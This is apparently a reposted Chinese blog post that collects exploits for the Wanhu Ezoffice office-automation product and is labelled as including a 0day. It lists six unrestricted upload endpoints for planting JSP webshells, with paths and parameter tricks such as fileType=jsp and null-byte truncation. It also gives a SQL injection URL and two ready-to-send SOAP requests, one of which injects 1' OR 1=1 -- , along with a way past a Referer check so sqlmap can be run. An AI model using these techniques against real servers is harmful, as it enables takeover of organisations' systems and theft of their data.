内容简介:万户Ezoffice 漏洞集合+0day
老版本任意文件上传、Web Service SQLi、New Web Serivce SQLi
一、老版本的用户已经不多了
1、第一处上传点
/defaultroot/govezoffice/gov_documentmanager/senddocument_import.jsp
构造参数上传,构造fileType=jsp来完成上传。
利用第一处上传的表单,直接上传jsp文件;直接返回文件名,如图:(查看源代码)
文件在upload参数设置的“archives”: /defaultroot/upload/archives/
2、第二处上传点
/defaultroot/customize/formClassUpload.jsp
没有任何限制直接上传,上传后的文件名是原文件名。
存在 defaultroot/devform/customize/
目录下 查看源代码看文件名
3、第三处上传点(鸡肋)
/defaultroot/public/jsp/smartUploadPic.jsp
利用第三处的构造参数截断URL和上传的文件名#需服务器支持URL允许存在空字节!文件上传存在 /defaultroot/upload/archives/
下
4、第四处上传点
/defaultroot/work_flow/jsFileUpload.jsp
后门!简直就是后门,只能上传jsp文件!∑(O_O;)
文件上传在: /defaultroot/devform/workflow/
原上传文件名。
5、第五处上传点
/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
文件位置 /defaultroot/upload/information/
6、第六处上传点
/defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null
文件位置: /defaultroot/upload/sound/
二、SQLi
/defaultroot/public/select_user/search_org_list.jsp?searchName=
三、老版本Web Service SQLi
/defaultroot/xfservices/DealFileWebService
POST包:
POST /defaultroot/xfservices/DealFileWebService HTTP/1.1 Host: www.*..cn:7890 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: LocLan=zh_CN DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 567 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://com.whir.mobile/DealFileWebService"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:getUserByAccount> <urn:userAccount>1</urn:userAccount> </urn:getUserByAccount> </SOAP-ENV:Body></SOAP-ENV:Envelope>
四、New Web Service SQLi
老版本看到Web Service存在 SQL 注入后,想着去看看最新的版本。但是访问 xfservices
直接跳转首页,找不到Web Serivce了。
就去找了一下开发手册看看,你猜怎么着~๑乛◡乛๑
在Web Service Editor手工测试的时候,测试出来了存在SQL注入。
后来在抓包的时候遇到了坑,无法通过浏览器和burp直接抓包。(╯—﹏—)╯(┷━━━┷ 无法抓包,怎么愉快的丢SQLmap?
就去看了看漏洞库关于web service的注入漏洞,看到了几个例子需要中转脚本?(⊙⊙?)
怎么办,我不会写中转脚本。(╥╯^╰╥)
然后通过AWVS的HTTP Editor功能才知道,原来是有Referfer验证。所以加入Referfer就可以抓POST包丢SQLMAP了~
之前wooyun的需要中转脚本的Web Service 注入同理。
so
POST包:
POST /defaultroot/services/ExchangeService HTTP/1.1 Content-Type: text/xml SOAPAction: "" Content-Length: 788 X-Requested-With: XMLHttpRequest Referer: http://oa.*.*.cn:7001/defaultroot/services/ExchangeService?wsdl Host: oa.*.*.cn:7001 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://61.187.198.50:82/defaultroot/services/ExchangeService" xmlns:urn1="http://po.exchange.govezoffice.whir.com" xmlns:urn3="http://xml.apache.org/xml-soap"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <getExchangeUnitsByParameterAll> <unitLevel>1</unitLevel> <unitAccount>1' OR 1=1 -- </unitAccount> <orderBy>1</orderBy> </getExchangeUnitsByParameterAll> </SOAP-ENV:Body> </SOAP-ENV:Envelope> 结果你猜怎么着,出来的是延时注入,surprise!!!还无视waf....嗷呜~ヾ(*´∇`)ノ
以上所述就是小编给大家介绍的《万户Ezoffice 漏洞集合+0day》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- Joomla历史插件漏洞集合
- Python常见安全漏洞及修复方法集合!你所不会的这里都有!
- Scala 中的集合(二):集合性能比较
- Scala 中的集合(二):集合性能比较
- 《面试知识,工作可待:集合篇》:Java 集合面试知识大全
- 如何对集合对象求合计,然后追加在该集合对象中
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。